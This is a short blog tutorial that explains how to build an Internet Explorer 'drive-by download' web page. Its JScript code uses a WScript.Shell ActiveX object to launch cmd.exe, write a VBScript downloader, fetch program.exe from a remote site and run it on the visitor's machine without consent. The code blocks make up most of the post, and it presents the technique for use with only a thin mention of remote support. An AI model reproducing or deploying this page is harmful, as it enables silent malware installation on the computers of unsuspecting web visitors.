Internet Explorer Drive By Download

Share This:

If you like my work show support on my Patreon
The following can be used for both good purposes and malicious purposes. However in the cyber security community this is considered to be a major vulnerability. Many security experts claim that ActiveX is nothing but security vulnerabilities. I say that about Windows in general.

That being said in the post I will show you how to create a web page that uses Javascript to access Internet Explorers ActiveX features in the attempts to download and install a program onto the Windows computer without the user giving any permission.

To access the ActiveX controls in Internet explorer using Javascript we type the following code.

<script language="JScript">
function fnShellExecuteJ()
{
var run = new ActiveXObject('WSCRIPT.Shell').Run('');
}
</script>

The code should be self explanitory. But if it isn’t I will explain it. The function fnShellExecuteJ() creates a function called fnShellExecuteJ(). In that function we create a variable called run. The variable creates a new ActiveX Object which opens the Windows Scripting Shell. We then can run any program on the users computer. So lets run the command prompt on the users computer. We will make our code look like the following.


<script language="JScript">
function fnShellExecuteJ()
{
var run = new ActiveXObject('WSCRIPT.Shell').Run('cmd.exe');
}
</script>

Now the command prompt will pop up. But we can make the command prompt run commands. In our case we will make the command prompt write a Visual Basic Script then run the script. To do this we modify our javascript code to look like the following.


<script language="JScript">
function fnShellExecuteJ()
{
var run = new ActiveXObject('WSCRIPT.Shell').Run('cmd.exe /c echo strFileURL = "http://somesite.com/program.exe" > file.vbs & echo strHDLocation = "program.exe" >> file.vbs & cscript.exe file.vbs & program.exe');
}
</script>

The above is shortened for the sake of this article. But if you know how to download a file using VBS scripting then you should have the basic idea above. As you can see at the end of the command we have cscript.exe file.vbs which pretty much runs the script we created that downloads a program called program.exe. Which then gets executed at the very end.

As you can see this can be useful to support professionals who need to remotely access a persons computer as easily as possible. However there isn’t anything stopping anyone from making this download very malicious software without the user knowing.

This is just one of the thousands of vulnerabilities in Internet Explorer. And it is also one of the most common vulnerabilities.

If you like my work show support on my Patreon